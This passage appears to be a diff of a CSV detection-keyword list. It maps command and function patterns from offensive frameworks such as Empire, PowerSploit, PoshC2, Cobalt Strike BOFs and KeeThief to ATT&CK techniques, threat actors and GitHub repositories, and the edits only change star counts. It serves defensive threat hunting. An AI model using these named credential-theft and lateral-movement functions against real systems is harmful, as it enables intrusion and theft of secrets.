T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Find-KeePassconfig*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-InterestingDomainShareFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*find-interestingfile -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Find-InterestingFile*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-KeePassconfig*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-KeePassconfig*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*findlocaladminaccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*findlocaladminaccess*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-LocalAdminAccess*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Find-LocalAdminAccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Find-LocalAdminAccess*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Find-LocalAdminAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-LocalAdminAccess*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-LocalAdminAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-LocalAdminAccess*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-LogonScriptCredentials -LogonScripts*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" "*Find-LogonScriptCredentials.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" "*FindModule *.dll*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" "*FindObjects-BOF*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" -"*Find-PathDLLHijack*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-PathDLLHijack*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Find-ProcessDLLHijack*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-ProcessDLLHijack*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-PathDLLHijack*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-PathDLLHijack*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-ProcessDLLHijack*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-ProcessDLLHijack*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*FindProcessTokenAndDuplicate*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 